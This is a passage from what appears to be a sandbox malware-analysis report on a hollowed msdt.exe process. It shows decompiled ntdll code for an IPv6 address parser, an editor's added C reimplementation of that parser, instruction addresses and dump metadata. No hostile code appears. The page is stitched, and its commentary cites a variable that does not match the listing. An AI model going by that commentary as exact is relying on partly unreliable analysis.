                                                                            									goto L29;
                                                                            								}
                                                                            								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                            								goto L19;
                                                                            							}
                                                                            						}
                                                                            						L21:
                                                                            						if(_v8 > 7 || _t167 >= 0x80) {
                                                                            							break;
                                                                            						} else {
                                                                            							if(E0262685D(_t167, 4) == 0) {
                                                                            								if(E0262685D(_t167, 0x80) != 0) {
                                                                            									if(_v12 > 0) {
                                                                            										break;
                                                                            									}
                                                                            									_t127 = 1;
                                                                            									_a7 = 1;
                                                                            									_v24 = _t164;
                                                                            									_v20 = 1;
                                                                            									_v16 = 1;
                                                                            									L36:
                                                                            									if(_v20 == _t127) {
                                                                            										goto L19;
                                                                            									}
                                                                            									_t158 = 0;
                                                                            									goto L14;
                                                                            								}
                                                                            								break;
                                                                            							}
                                                                            							_a7 = 0;
                                                                            							_v24 = _t164;
                                                                            							_v20 = 1;
                                                                            							_v16 = 1;
                                                                            							goto L19;
                                                                            						}
                                                                            					}
                                                                            					_t130 = _t118 - 1;
                                                                            					if(_t130 != 0) {
                                                                            						if(_t130 == 1) {
                                                                            							goto L21;
                                                                            						}
                                                                            						_t127 = 1;
                                                                            						goto L36;
                                                                            					}
                                                                            					if(_t167 >= 0x80) {
                                                                            						L7:
                                                                            						if(_t167 == 0x3a) {
                                                                            							_t158 = 0;
                                                                            							if(_v12 > 0 || _v8 > 6) {
                                                                            								break;
                                                                            							} else {
                                                                            								_t119 =  &(_t164[1]);
                                                                            								if( *_t119 != _t167) {
                                                                            									_v8 = _v8 + 1;
                                                                            									L13:
                                                                            									_v20 = _t158;
                                                                            									goto L14;
                                                                            								}
                                                                            								if(_v28 != 0) {
                                                                            									break;
                                                                            								}
                                                                            								_v28 = _v8 + 1;
                                                                            								_t143 = 2;
                                                                            								_v8 = _v8 + _t143;
                                                                            								goto L47;
                                                                            							}
                                                                            						}
                                                                            						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                            							break;
                                                                            						} else {
                                                                            							_v12 = _v12 + 1;
                                                                            							_t158 = 0;
                                                                            							goto L13;
                                                                            						}
                                                                            					}
                                                                            					if(E0262685D(_t167, 4) != 0) {
                                                                            						_v16 = _v16 + 1;
                                                                            						goto L19;
                                                                            					}
                                                                            					if(E0262685D(_t167, 0x80) != 0) {
                                                                            						_v16 = _v16 + 1;
                                                                            						if(_v12 > 0) {
                                                                            							break;
                                                                            						}
                                                                            						_a7 = 1;
                                                                            						goto L19;
                                                                            					}
                                                                            					goto L7;
                                                                            				}
                                                                            				 *_a8 = _t164;
                                                                            				if(_v12 != 0) {
                                                                            					if(_v12 != 3) {
                                                                            						goto L29;
                                                                            					}
                                                                            					_v8 = _v8 + 1;
                                                                            				}
                                                                            				if(_v28 != 0 || _v8 == 7) {
                                                                            					if(_v20 != 1) {
                                                                            						if(_v20 != 2) {
                                                                            							goto L29;
                                                                            						}
                                                                            						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                            						L65:
                                                                            						_t105 = _v28;
                                                                            						if(_t105 != 0) {
                                                                            							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                            							E02608980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                            							_t110 = 8;
                                                                            							E025FDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                            						}
                                                                            						return 0;
                                                                            					}
                                                                            					if(_v12 != 0) {
                                                                            						if(_v16 > 3) {
                                                                            							goto L29;
                                                                            						}
                                                                            						_t114 = E0262EE02(_v24, 0, 0xa);
                                                                            						_t170 = _t170 + 0xc;
                                                                            						if(_t114 > 0xff) {
                                                                            							goto L29;
                                                                            						}
                                                                            						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                            						goto L65;
                                                                            					}
                                                                            					if(_v16 > 4) {
                                                                            						goto L29;
                                                                            					}
                                                                            					_t115 = E0262EE02(_v24, 0, 0x10);
                                                                            					_t170 = _t170 + 0xc;
                                                                            					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                            					goto L65;
                                                                            				} else {
                                                                            					goto L29;
                                                                            				}
                                                                            			}
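The decompiled routine above is not part of the sample itself: the string IDs (RTL critical-section timeout messages) and the msdt.exe snapshot name mark it as ntdll code living in the hollowed process. Reading its checks, the function walks a UTF-16 string, treats 0x3a (':') and 0x2e ('.') specially, allows at most four hex digits per group and at most eight groups, accepts "::" once (recorded in _v28 and expanded at L65 with a memmove and a zero-fill), and parses a trailing dotted quad whose octets must not exceed 0xff; on any violation it returns 0xC000000D (STATUS_INVALID_PARAMETER). That is the shape of an RtlIpv6StringToAddress-style IPv6 literal parser. The following C program is an added example written for this page, not code from the report or from ntdll: it reimplements that parsing logic in readable form so the decompiled control flow can be followed. The identification of the routine as an IPv6 parser is this editor's reading of the checks above, and the function names, the -1 return convention and the test inputs are this example's own.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not the page's or ntdll's code): parse an IPv6 literal such
   as "2001:db8::1" or "::ffff:192.0.2.1" into 16 network-order bytes.
   Returns 0 on success (and sets *end to the first unparsed character, as the
   decompiled code does via *_a8), -1 where the decompiled routine returns
   0xC000000D.  Parsing stops at the first character that is neither ':' nor a
   hex digit; validation then decides whether what was read is a full address. */
int parse_ipv6_literal(const char *s, uint8_t out[16], const char **end)
{
    uint16_t groups[8] = {0};
    int ngroups = 0;   /* 16-bit groups stored so far                     */
    int dc_pos  = -1;  /* group index where "::" appeared, -1 if none     */
    const char *p = s;

    for (;;) {
        if (p[0] == ':' && p[1] == ':') {              /* "::" at most once */
            if (dc_pos >= 0) return -1;
            dc_pos = ngroups;
            p += 2;
            if (*p == ':') return -1;                  /* ":::" is malformed */
            continue;
        }
        if (*p == ':') {                               /* single separator */
            if (ngroups == 0 && dc_pos < 0) return -1; /* leading lone ':'  */
            p++;
            if (!isxdigit((unsigned char)*p)) return -1; /* needs a group   */
            continue;
        }
        if (!isxdigit((unsigned char)*p)) break;       /* terminator        */
        if (ngroups >= 8) return -1;                   /* too many groups   */

        const char *start = p;
        unsigned val = 0;
        int nhex = 0;
        while (isxdigit((unsigned char)*p)) {          /* scan one group    */
            int c = tolower((unsigned char)*p);
            val = (val << 4) | (unsigned)(isdigit(c) ? c - '0' : c - 'a' + 10);
            p++; nhex++;
        }
        if (*p == '.') {                               /* embedded IPv4     */
            if (ngroups > 6) return -1;                /* needs two groups  */
            int oct[4];
            const char *q = start;
            for (int i = 0; i < 4; i++) {
                int v = 0, nd = 0;
                while (isdigit((unsigned char)*q) && nd < 3) {
                    v = v * 10 + (*q - '0'); q++; nd++;
                }
                if (nd == 0 || v > 255) return -1;     /* octet <= 0xff     */
                if (i < 3) { if (*q != '.') return -1; q++; }
                oct[i] = v;
            }
            groups[ngroups++] = (uint16_t)((oct[0] << 8) | oct[1]);
            groups[ngroups++] = (uint16_t)((oct[2] << 8) | oct[3]);
            p = q;
            break;                                     /* dotted quad is last */
        }
        if (nhex > 4) return -1;                       /* max 4 hex digits  */
        groups[ngroups++] = (uint16_t)val;
    }

    if (dc_pos < 0 && ngroups != 8) return -1;         /* no "::": need 8   */
    if (dc_pos >= 0 && ngroups > 7) return -1;         /* "::" must fill >=1 */

    /* Expand "::": move the groups after it to the end, zero the gap.  This
       is the memmove + memset pair at label L65 of the decompiled listing. */
    if (dc_pos >= 0) {
        int after = ngroups - dc_pos;
        memmove(&groups[8 - after], &groups[dc_pos], (size_t)after * sizeof groups[0]);
        memset(&groups[dc_pos], 0, (size_t)(8 - ngroups) * sizeof groups[0]);
    }
    for (int i = 0; i < 8; i++) {                      /* network byte order */
        out[2 * i]     = (uint8_t)(groups[i] >> 8);
        out[2 * i + 1] = (uint8_t)(groups[i] & 0xff);
    }
    if (end) *end = p;
    return 0;
}

/* Helper: -1 if s is rejected, 1 if the 16 parsed bytes equal the 32-hex-digit
   string expect, 0 if parsed but different. */
int check_ipv6(const char *s, const char *expect)
{
    uint8_t b[16];
    char hex[33];
    if (parse_ipv6_literal(s, b, NULL) != 0) return -1;
    for (int i = 0; i < 16; i++) snprintf(hex + 2 * i, 3, "%02x", b[i]);
    return strcmp(hex, expect) == 0;
}

/* Helper: number of characters consumed before the terminator, -1 if rejected. */
int ipv6_consumed(const char *s)
{
    uint8_t b[16];
    const char *end;
    if (parse_ipv6_literal(s, b, &end) != 0) return -1;
    return (int)(end - s);
}

int main(void)
{
    const char *samples[] = { "::1", "2001:db8::ff00:42:8329", "::ffff:192.0.2.128",
                              "12345::", "1:2:3:4:5:6:7:8:9" };   /* constructed inputs */
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint8_t b[16];
        if (parse_ipv6_literal(samples[i], b, NULL) != 0) {
            printf("%-24s rejected (STATUS_INVALID_PARAMETER in the original)\n", samples[i]);
            continue;
        }
        printf("%-24s ", samples[i]);
        for (int j = 0; j < 16; j++) printf("%02x%s", b[j], j % 2 ? " " : "");
        printf("\n");
    }
    return 0;
}
```

The rejection paths are the ones worth comparing with the listing: a fifth hex digit (_v16 > 4), a ninth group (_v8 > 7), a second "::" (_v28 already set), an octet above 0xff (_t122 > 0xff) and a stray leading ':' all land on the same failure return, which is why the decompiled code funnels so many branches into label L29.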
                                                                            Instruction addresses for the listing above (one per decompiled line in the original report; the alignment was lost in extraction): 0x0262fcd1 to 0x0262fe2f, 0x0263a3a1, 0x02641fe7 to 0x02642018, and 0x0265ec67 to 0x0265ed1b.
                                                                            0x00000000
                                                                            0x0262fd36
                                                                            0x0262fe0f
                                                                            0x0262fe16
                                                                            0x0263a3ad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0263a3b3
                                                                            0x0263a3b3
                                                                            0x0262fe1f
                                                                            0x0265ed25
                                                                            0x0265ed86
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed91
                                                                            0x0265ed95
                                                                            0x0265ed95
                                                                            0x0265ed9a
                                                                            0x0265edad
                                                                            0x0265edb3
                                                                            0x0265edba
                                                                            0x0265edc4
                                                                            0x0265edc9
                                                                            0x00000000
                                                                            0x0265edcc
                                                                            0x0265ed2a
                                                                            0x0265ed55
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed61
                                                                            0x0265ed66
                                                                            0x0265ed6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed7d
                                                                            0x00000000
                                                                            0x0265ed7d
                                                                            0x0265ed30
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed3c
                                                                            0x0265ed43
                                                                            0x0265ed4b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

APIs
Memory Dump Source
• Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
• Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 7493d77a756961aa6d2c36822f6345ff883c559a6a36fb9f0d3e160be65c283f
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: FE91B131D0062AEEDF29CF98C8447AEB7B4FF41308F20846AD855A7691EB715B49CF91
Uniqueness
• Uniqueness Score: -1.00%